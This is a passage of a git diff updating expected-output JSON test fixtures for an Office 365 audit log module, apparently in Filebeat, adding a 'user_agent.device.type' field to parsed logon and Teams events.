@@ -631,6 +640,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json index 749af2475a3..4cef7b83abb 100644 --- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json @@ -91,6 +91,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -190,6 +191,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -289,6 +291,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -388,6 +391,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -487,6 +491,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -586,6 +591,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -685,6 +691,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -784,6 +791,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -883,6 +891,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -982,6 +991,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1081,6 +1091,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1180,6 +1191,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1279,6 +1291,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -1378,6 +1391,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1474,6 +1488,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1573,6 +1588,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1672,6 +1688,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1768,6 +1785,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -1867,6 +1885,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1966,6 +1985,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2065,6 +2085,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2164,6 +2185,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2263,6 +2285,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -2362,6 +2385,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2461,6 +2485,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2560,6 +2585,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2659,6 +2685,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2758,6 +2785,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -2857,6 +2885,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2955,6 +2984,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3055,6 +3085,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3140,6 +3171,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3239,6 +3271,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3324,6 +3357,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -3424,6 +3458,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3509,6 +3544,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3609,6 +3645,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3708,6 +3745,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3807,6 +3845,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3892,6 +3931,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -3992,6 +4032,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4088,6 +4129,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4187,6 +4229,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4286,6 +4329,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4371,6 +4415,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4470,6 +4515,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -4569,6 +4615,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4668,6 +4715,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4767,6 +4815,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4866,6 +4915,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4965,6 +5015,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -5064,6 +5115,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5163,6 +5215,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5262,6 +5315,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5361,6 +5415,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5460,6 +5515,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -5559,6 +5615,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5658,6 +5715,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5754,6 +5812,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5853,6 +5912,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5952,6 +6012,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -6051,6 +6112,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6150,6 +6212,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6249,6 +6312,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6348,6 +6412,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6447,6 +6512,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -6546,6 +6612,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6645,6 +6712,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6744,6 +6812,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json index 372b29d8c2c..4a7b5761b35 100644 --- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json @@ -179,6 +179,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -255,6 +256,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, 
@@ -307,6 +309,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -359,6 +362,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -411,6 +415,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -463,6 +468,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -515,6 +521,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -581,6 +588,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -633,6 +641,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -685,6 +694,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -762,6 +772,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, 
@@ -832,6 +843,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -909,6 +921,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -986,6 +999,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1063,6 +1077,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1140,6 +1155,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1217,6 +1233,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1294,6 +1311,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1477,6 +1495,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": 